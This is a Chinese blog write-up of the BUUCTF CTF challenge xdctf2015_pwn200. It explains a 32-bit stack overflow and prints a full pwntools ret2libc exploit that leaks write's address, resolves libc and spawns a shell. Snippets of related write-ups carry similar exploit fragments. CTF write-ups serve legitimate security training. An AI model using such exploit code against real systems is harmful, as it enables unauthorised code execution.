[BUUCTF]PWN——xdctf2015_pwn200

最新推荐文章于 2022-03-03 19:08:39 发布
最新推荐文章于 2022-03-03 19:08:39 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/109622553
版权

xdctf2015_pwn200

附件

步骤

  1. 例行检查,32位程序,开启了nx保护
    在这里插入图片描述
  2. 本地试运行一下程序,看看大概的情况
    在这里插入图片描述
  3. 32位ida载入,习惯性的检索程序里的字符串,没有发现什么铭感的地方,直接看main函数
    在这里插入图片描述
    vuln函数
    在这里插入图片描述
    参数buf存在溢出漏洞,由于开启了nx,没有可以直接利用的后门,这边使用ret2libc的方法

利用过程:

  1. 先用write函数泄露libc版本
payload='a'*(0x6c+4)                    #溢出到ret
payload+=p32(write_plt)+p32(vuln_addr)  #覆盖ret为write,write结束后跳转到vuln函数继续执行,为我们第二次利用输入点构造rop攻击做准备
payload+=p32(1)+p32(write_got)+p32(4)   #write函数的参数

r.sendline(payload)

#write_addr=u32(r.recv(4))
write_addr=u32(r.recvuntil('\xf7')[-4:])  #接收泄露的程序里write函数的地址

write_addr=u32(r.recvuntil('\xf7')[-4:])这边说一下这句话是怎么来的
我一开始写的write_addr=u32(r.recv(4))没有接收到我想要的地址,这个时候我们可以加句语句 context.log_level="debug" 去看一下数据传输的过程
在这里插入图片描述
可以看到我们传入的a字符串结束的地方是0x7C,后面跟着的就是我们泄露出来的write函数的地址,我写的意思是从0x7F(这一行末尾),往前截取4字节,得到了我们的write函数的地址

  1. 计算出system和bin/sh的地址,去构造rop攻击
libc=LibcSearcher('write',write_addr)

libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')

payload='a'*(0x6c+4)+p32(system)+p32(vuln_addr)+p32(binsh)

完整exp:

from pwn import *
from LibcSearcher import *

r=remote('node3.buuoj.cn',27464)
elf=ELF('./bof')
context.log_level='debug'

write_plt=elf.plt['write']
write_got=elf.got['write']
vuln_addr=0x80484D6

payload='a'*(0x6c+4)+p32(write_plt)+p32(vuln_addr)+p32(1)+p32(write_got)+p32(4)

r.sendline(payload)

#write_addr=u32(r.recv(4))
write_addr=u32(r.recvuntil('\xf7')[-4:])

libc=LibcSearcher('write',write_addr)

libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')

payload='a'*(0x6c+4)+p32(system)+p32(vuln_addr)+p32(binsh)

r.sendline(payload)
r.interactive()

在这里插入图片描述

Angel~Yan
关注
专栏目录
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 365
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF pwn——pwnable_orw
最新发布
CNS-Enterprise BCC-1701-J
05-06 293
BUUCTF 做题练习
xdctf2015前20名writeup
10-07
2015xdctf前20名的writeup,绝对不坑
xdctf2015_pwn200
m0sway的博客
11-30 1814
xdctf2015_pwn200.py 使用checksec查看: 只开启了栈溢出。 拉进IDA中查看: main()中直接给出了漏洞函数,跟进查看: 一个简单明了的栈溢出。距离ebp0x6c 用write()函数泄露libc。 exp: from pwn import * #start r = remote("node4.buuoj.cn",27929) # r = process("../buu/xdctf2015_pwn200") elf = ELF("../buu/xdctf2015_p
BUUCTF xdctf2015_pwn200
qq_51821131的博客
10-05 1639
xdctf2015_pwn200 检查一下保护 拖进ida看看 存在明显栈溢出,但是没有system和binsh 但是可以通过泄露,找到地址,并拿到shell from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26340) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./bof') read_got=elf.got['read'] write_pl
[BUUCTF-pwn]——xdctf2015_pwn200
Y_peak的博客
03-17 282
[BUUCTF-pwn]——xdctf2015_pwn200 一个简单的ret2libc的题目, 前面写了不少了这里只给exp了 exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27025) elf = ELF('./bof') write_plt = elf.plt['write'] write_got = elf.got['write'] main = elf.symbols['main']
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4129
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1023
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
ORACLE第2天
07-28
NULL 博文链接:https://ws694617206.iteye.com/blog/773606
(攻防世界)(XDCTF-2015pwn200
PLpa的博客
07-13 2244
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
XDCTF2015 PWN200
Bill
03-01 1772
XDCTF 2015 PWN200 一. 源码(自己敲出来的) #include <stdio.h> #include <unistd.h> #include <string.h> int vuln(){ char buf[80]; setbuf(stdin, buf); return read(0, buf, 256)...
xdctf-pwn200
Vccxx的博客
04-08 1370
XDCTF (哪一年的忘了)中的一道pwn题题目地址http://pan.baidu.com/s/1hszHtwo解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode首先用ida分析这题的反汇编:这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会
XDCTF-2015 pwn-200 backdoorctf-2015 echo
qq_41071646的博客
05-17 689
XDCTF-2015 pwn-200 简单的泄露基址 这里就不多讲了 #!/usr/bin/python2 # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=remote("111.198.29.45",32529) io=process("./pwn") elf=ELF("./pwn") li...
XDCTF coding200
blackcat
10-08 731
之前在某项目中实现过了=0=
[XCTF-pwn] 7-forgot 14-xdctf-pwn-200
weixin_52640415的博客
03-03 165
有后门cat flag 直接在溢出后写入后门地址即可 from pwn import * p = remote('111.200.241.244', 56567) system = 0x80486cc p.sendlineafter(b"> ", b'1') p.sendlineafter(b"> ", b'0@0.'+ b'a'*28 + p32(system)*10) print(p.recv()) p.interactive() ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值